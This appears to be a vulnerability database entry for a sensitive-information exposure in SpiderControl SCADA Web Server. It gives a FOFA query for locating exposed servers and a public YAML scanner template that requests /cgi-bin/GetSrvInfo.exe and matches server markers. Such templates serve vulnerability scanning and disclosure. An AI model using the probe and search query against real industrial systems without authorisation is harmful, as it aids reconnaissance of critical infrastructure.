spidercontrol-scada-server-info: SpiderControl SCADA Web Server - Sensitive Information Exposure

Date: 2025-09-01 | Affected software: SpiderControl SCADA Web Server | PoC: public

Vulnerability description

SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous market-leading OEM manufacturers, from a wide variety of industries, rely on SpiderControl.

FOFA query: "SpiderControl"

PoC code [public]

id: spidercontrol-scada-server-info

info:
  name: SpiderControl SCADA Web Server - Sensitive Information Exposure
  author: geeknik
  severity: high
  verified: true
  description: |-
    SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl.
    fofa: "SpiderControl"
  reference:
    - https://spidercontrol.net/spidercontrol-inside/
  tags: spidercontrol,scada,exposure,misconfig
  created: 2024/03/18

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/GetSrvInfo.exe
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'powered by SpiderControl') &&
      response.body.bcontains(b'LSWEBSERVER') &&
      response.body.bcontains(b'SCWEBSERVICES')
expression: r0()